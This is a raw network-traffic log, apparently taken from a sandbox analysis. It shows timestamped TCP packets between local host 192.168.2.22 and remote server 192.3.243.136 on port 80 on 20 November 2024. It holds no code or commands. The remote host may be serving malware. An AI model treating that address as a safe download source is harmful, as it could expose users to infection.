                                                                    Nov 20, 2024 07:56:45.798605919 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798614025 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798621893 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798629045 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798640013 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798687935 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798707008 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798707008 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798721075 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798722982 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798733950 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798753977 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798769951 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798775911 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798787117 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798801899 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798806906 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798823118 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798839092 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.854665995 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.854680061 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.854698896 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.854748011 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.854762077 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.854774952 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.854784966 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.854788065 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.854788065 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.854800940 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.854810953 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.854827881 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.855261087 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.878828049 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.878844976 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.878865004 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.878875971 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.878952026 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.878962994 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.878971100 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.878971100 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.878998041 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879008055 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879009008 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879019976 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879025936 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879029989 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879051924 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879054070 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879070997 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879076958 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879081964 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879095078 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879096985 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879112005 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879113913 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879122019 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879136086 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879137039 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879156113 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879162073 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879173040 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879173040 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879189014 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879192114 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879199028 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879210949 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879213095 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879225016 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879225969 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879242897 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879244089 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879251957 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879266024 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879287958 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879352093 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879364014 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879379034 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879389048 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879393101 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879399061 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879412889 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879416943 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879435062 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879439116 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879446030 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879458904 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879460096 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879470110 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879472971 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879487991 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879492998 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879503012 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879509926 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879513025 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879527092 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879528999 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879537106 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879545927 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879554033 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879560947 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879580975 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879601955 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879611969 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879631996 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879643917 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879648924 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879664898 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879671097 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879681110 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879682064 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879693985 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879703999 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879705906 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879723072 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879725933 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879745007 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879762888 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879770041 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879837036 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879848957 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879873037 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879892111 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879892111 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879904032 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879914045 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879920006 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879937887 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879952908 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879955053 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.879962921 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.879980087 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880002022 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880023003 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880047083 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880059004 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880073071 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880089045 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880089998 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880105019 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880106926 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880117893 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880125046 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880131960 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880141973 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880143881 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880156040 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880160093 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880168915 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880178928 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880182028 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880196095 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880198956 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880222082 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880238056 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880304098 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880314112 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880328894 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880338907 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880347013 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880352974 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880367041 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880368948 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880381107 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880392075 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880394936 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880418062 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880438089 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880439997 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880448103 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880455017 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880485058 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880584955 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880640984 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880661011 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880671024 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880676985 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880681038 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880696058 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880697012 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880708933 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880721092 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880721092 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880733967 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880739927 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880747080 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880757093 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880759954 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880773067 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880774975 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880783081 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880791903 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880798101 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880810022 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880811930 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880822897 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880831003 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880837917 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880850077 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880868912 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880902052 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880911112 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880932093 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880942106 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880944014 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880955935 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880969048 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880971909 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880980968 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.880990028 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.880994081 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.881007910 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.881010056 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.881027937 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.881045103 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.881068945 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.941133022 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.941152096 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.941174030 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.941185951 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.941205025 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.941215992 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.941226959 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.941241980 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.941241980 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.941247940 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.941272974 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.941272974 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.941287041 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965038061 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965126038 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965157986 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965245962 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965301991 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965310097 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965339899 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965351105 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965352058 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965368032 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965377092 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965382099 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965396881 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965398073 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965415001 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965425014 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965428114 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965428114 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965437889 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965440035 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965456009 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965456963 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965473890 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965475082 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965490103 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965495110 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965502977 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965511084 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965517044 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965528965 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965531111 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965547085 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965549946 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965559959 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965564966 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965570927 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965581894 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965600014 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965601921 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965611935 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965616941 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965622902 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965632915 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965643883 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965650082 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965662003 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965670109 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965673923 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965681076 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965691090 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965693951 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965704918 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965706110 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965715885 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965727091 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965730906 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965744019 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965744972 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965756893 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965764046 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965770006 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965785027 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965789080 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965802908 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965806961 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965817928 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965820074 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965827942 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965840101 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965842962 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965854883 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965857029 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965868950 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965893984 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965924978 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965939045 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965939045 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965950012 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965958118 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965960026 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965976000 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965981960 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965992928 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966006994 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966011047 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966017008 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966027975 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966036081 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966042042 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966053009 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966054916 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966068983 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966074944 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966088057 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966104984 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966110945 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966154099 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966167927 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966187000 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966202021 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966249943 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966270924 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966289997 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966303110 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966310978 CET8049167192.3.243.136192.168.2.22
